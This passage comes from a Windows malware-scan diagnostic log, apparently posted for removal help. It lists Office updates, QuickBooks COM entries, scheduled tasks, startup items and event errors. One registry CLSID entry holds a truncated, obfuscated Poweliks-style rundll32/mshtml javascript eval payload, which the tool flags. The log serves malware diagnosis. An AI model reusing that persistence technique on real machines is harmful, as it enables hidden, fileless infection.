Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2863811) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{53DEC068-4690-4F6B-9946-7D21EF02236B}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2889914) 32-Bit Edition (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{F3F83933-75FC-4B60-84F2-3F8FA63D042E}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Viewpoint Media Player (HKLM\...\ViewpointMediaPlayer) (Version:  - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Media Encoder 9 Series (HKLM\...\Windows Media Encoder 9) (Version:  - )
Windows Media Encoder 9 Series (Version: 9.00.2980 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{05EC5C13-D255-4592-9CCB-98615172F0D6}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{0ADF9C35-0D5E-4B75-88DD-B64868907E17}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{0D7FDC12-4366-3687-B4C4-93C84983BEB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{123FAF7F-3FB1-4B8F-AD18-0047401D436A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{368CB9E8-3035-3AA5-B0D1-50FE1C930319}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{37A2FC00-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{37A2FC02-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4431F57E-8B58-387E-AC60-6DD3E7850CD5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4716D3CE-55DB-4D2A-818C-87D912895890}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4844F3F7-2161-4AC4-B219-B3B4311782AA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4A56F19E-9F50-4F43-93C8-050E44AA83A9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{4E5E74B5-8EB5-4859-A335-837EED412620}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{5428A9ED-6CD8-11D6-9C8A-0001023DCAA2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{547C8F00-5567-4AE3-8BB0-CC3CE2AB9070}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{57D590F1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{596801D8-2C9D-4627-9C67-195CB81B655A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{5B7331FA-8910-4748-A8A4-60B445041F28}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{5ED8AC89-B2DE-476D-8EEA-E170B2FCB058}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{60E1979E-326D-3D30-A96C-C6ADCDD2AF66}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{634C733B-EABF-3922-BA49-5CB3927D480C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{6d05bf60-3eaf-4a97-87c5-10cce505435b}\localserver32 -> C:\Users\Dale\AppData\Local\Temp\{9c0ba3c1-2b67-45eb-bf69-bed9658d28d2}\IDriver.NonElevated.exe No F (the data entry has 3 more characters).
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{738CD606-129D-45db-86D6-6C9739C750CA}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2009\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{7694F1CD-A55B-4B7C-8820-A90892EB4E9E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{7DBF8260-30AD-4D1B-876A-8032B87B809F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{828E5386-74CF-4019-B356-C857CD028A7D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{82CC31B3-53B4-4161-A4E9-6B4F1290A6C8}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{8572570D-12D9-4F2C-8BB8-EB8848178B94}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{8E590317-1329-11D1-B70B-00805F29CD16}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2009\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{8FEDE364-AB37-4551-80C9-6D468E222AB2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F2-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F3-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F4-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F5-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F6-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{9D9B61F7-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{A63E42D0-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{A63E42D2-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{AF5E0A13-CEAB-47CE-991D-77E82CD1BF3F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{B10BFAC3-EFF1-40D9-ADA0-BEBE037C24CA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{B66F2BF1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{BB048B39-D3CB-37BF-A746-068C9F9FF26B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D14FD6B3-6A9F-4537-9460-07B836707127}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D4A12AAF-E15E-470B-A6B6-63032186F91F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9B9C060-0954-11D3-9E07-00104BD2BE34}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\ViewSource.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6F81-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\cominifile.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6F84-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\cominifile.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6F87-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\cominifile.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6FA1-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\GraphSeriesCol.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6FA6-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\GraphSeriesCol.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{D9BC6FB2-A54B-11D4-A516-0050DA68678D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\StorageClasses.dll (Intuit, Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{DCB2B478-EFF6-48F6-B718-13E98876854E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{DFD0AF10-B86C-4AF3-B609-1348D513E565}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{E1A173E1-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{E1A173E3-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{EADA914E-5B08-4E85-8440-5A087504DF87}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{EAEF733D-5B08-4E85-8440-5A087504DF87}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{F2C593CC-74B2-4F71-8556-DD4D426D0409}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{FAC93D42-FFC2-11d1-9DEB-0008C7A08EBA}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2009\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-941127145-1180520044-1929224469-1000_Classes\CLSID\{FB17915F-06D1-4214-A902-CC5EE05186E9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
 
==================== Restore Points  =========================
 
06-09-2014 22:23:30 Scheduled Checkpoint
12-09-2014 23:34:50 Windows Update
13-09-2014 04:46:58 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2014-09-13 11:36 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0090CC82-95F4-4FED-8978-239F5D2A85E4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {03C33618-F7D4-422F-B67A-4F061659D15F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-06-22] (Google Inc.)
Task: {33A9FD5B-A60B-479C-B902-6B8CB20A2CFC} - System32\Tasks\RegZooka Cleanup => C:\Program Files\RegZooka\RegZookaCleanup.exe [2012-02-01] ()
Task: {3EDB0EC8-CC5E-4C93-A774-499AA4E874E4} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {BC68A2B6-36AC-4AA2-B081-0BC33BC7CCFA} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {C85BFC59-B731-484A-8BA2-81DAF74EAEF4} - System32\Tasks\Scheduled Update for Ask Toolbar => C:\Program Files\Ask.com\UpdateTask.exe <==== ATTENTION
Task: {D4B565C6-32F8-4DA6-B961-2B70876E81A0} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {F1F88050-21A6-42BD-BB9C-AC88AB767817} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-06-22] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-10-19 16:29 - 2008-11-13 10:47 - 00094208 _____ () C:\Windows\System32\Dell2335Port_x86.dll
2012-10-19 16:23 - 2007-12-10 02:57 - 00022723 _____ () C:\Windows\System32\sdf1ml3.dll
2012-02-20 21:29 - 2012-02-20 21:29 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2012-02-20 21:28 - 2012-02-20 21:28 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-10-18 10:18 - 2011-02-07 11:56 - 00138192 _____ () C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE
2013-12-09 08:38 - 2014-08-12 03:03 - 01654296 _____ () C:\Program Files\AVG Secure Search\TBAPI.dll
2010-06-07 05:35 - 2010-06-07 05:35 - 00282624 _____ () C:\Windows\system32\SaMinDrv.dll
2014-08-12 03:03 - 2014-08-12 03:03 - 00159768 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2014-08-12 03:03 - 2014-08-12 03:03 - 00519704 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2014-08-24 09:30 - 2014-08-24 09:30 - 03642480 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2014-01-08 13:48 - 2014-01-08 13:48 - 16242056 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^APC UPS Status.lnk => C:\Windows\pss\APC UPS Status.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk => C:\Windows\pss\Audible Download Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk => C:\Windows\pss\QuickBooks Update Agent.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Dale^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^AOL Desktop.lnk => C:\Windows\pss\AOL Desktop.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Dale\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: AVG_UI => "C:\Program Files\AVG\AVG2014\avgui.exe" /TRAYONLY
MSCONFIG\startupreg: CanonMyPrinter => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
MSCONFIG\startupreg: CanonSolutionMenuEx => C:\Program Files\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
MSCONFIG\startupreg: Dell PanelMgr => C:\Windows\Dell\PanelMgr\SSMMgr.exe /autorun
MSCONFIG\startupreg: Display => C:\Program Files\APC\PowerChute Personal Edition\DataCollectionLauncher.exe
MSCONFIG\startupreg: GoogleDriveSync => "C:\Program Files\Google\Drive\googledrivesync.exe" /autostart
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: HostManager => C:\Program Files\Common Files\AOL\1332695770\ee\AOLSoftware.exe
MSCONFIG\startupreg: iCloudServices => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
MSCONFIG\startupreg: IndexSearch => "C:\Program Files\DELL\Dell 2335dn MFP\PaperPort\IndexSearch.exe"
MSCONFIG\startupreg: Intuit SyncManager => C:\Program Files\Common Files\Intuit\Sync\IntuitSyncManager.exe  startup
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: PaperPort PTD => "C:\Program Files\DELL\Dell 2335dn MFP\PaperPort\pptd40nt.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: SDTray => "C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: SSBkgdUpdate => "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
MSCONFIG\startupreg: StartCCC => "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: T4S2PC => "C:\Windows\twain_32\Dell\Dell2335\Scan2Pc.exe"
MSCONFIG\startupreg: vProt => "C:\Program Files\AVG Secure Search\vprot.exe"
 
==================== Faulty Device Manager Devices =============
 
Name: WAN Miniport (PPPOE)
Description: WAN Miniport (PPPOE)
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: RasPppoe
Problem: : Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged. (Code 19)
Resolution: A registry problem was detected.
 This can occur when more than one service is defined for a device, if there is a failure opening the service subkey, or if the driver name cannot be obtained from the service subkey. Try these options:
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Click "Uninstall", and then click "Scan for hardware changes" to load a usable driver.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/14/2014 07:23:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc0000005
Fault offset: 0x00140273
Faulting process id: 0x12b4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (09/14/2014 01:09:25 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/14/2014 00:48:15 AM) (Source: SideBySide) (EventID: 33) (User: )
